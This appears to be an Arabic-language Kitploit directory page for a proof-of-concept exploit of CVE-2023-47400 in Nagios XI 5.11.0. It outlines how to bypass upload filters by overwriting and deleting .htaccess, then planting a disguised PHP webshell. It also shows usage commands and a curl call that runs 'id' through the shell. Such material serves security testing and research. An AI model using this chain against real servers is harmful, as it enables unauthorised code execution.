Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lucasvanhaaren/cve-2023-47400
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHublucasvanhaaren/cve-2023-47400

CVE-2023-47400

إثبات المفهوم لـ CVE-2023-47400

عرض المستودع
217منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-47400

إثبات المفهوم لـ CVE-2023-47400

تنفيذ كود PHP عن بُعد بعد المصادقة عبر كتابة ملفات عشوائية على Nagios XI 5.11.0


[!Note] يستند هذا الإثبات المفاهيمي (PoC) إلى النشرة الفنية التي نشرتها مجموعة NCC https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/

يتبع هذا الإثبات المفاهيمي العملية التالية:

  • رفع صورة صالحة باسم placeholder.jpg (ترويسة البايتات السحرية JFIF فقط، دون أي محتوى)
  • استخدام ميزة rename في Custom Includes لإعادة تسمية الصورة إلى .htaccess (مما يؤدي إلى استبدال ملف .htaccess الموجود)
  • استخدام ميزة delete في Custom Includes لحذف ملف .htaccess
  • رفع حمولة PHP (بانتحال توقيع صورة عبر ترويسات البايتات السحرية JFIF والامتداد المزدوج .jpg.php)

يؤدي استغلال هذه الثغرة إلى تنفيذ كود عن بُعد على مضيف Nagios XI، متجاوزًا مرشحات رفع الملفات (عبر مرشحات توقيع الملف وامتداد الملف) ومنع تنفيذ PHP (عبر .htaccess).

[!Warning] يقوم هذا الاستغلال بمسح ملف <NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess الموجود على المضيف للسماح بتنفيذ كود PHP!

الاستخدام

  • إعداد المشروع:
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
  • تخصيص حمولة PHP التي سيتم وضعها في مجلد رفع الصور

  • تشغيل سكربت الاستغلال:

python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
  • التفاعل مع الحمولة المُسقطة:
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)
تنزيل الأداة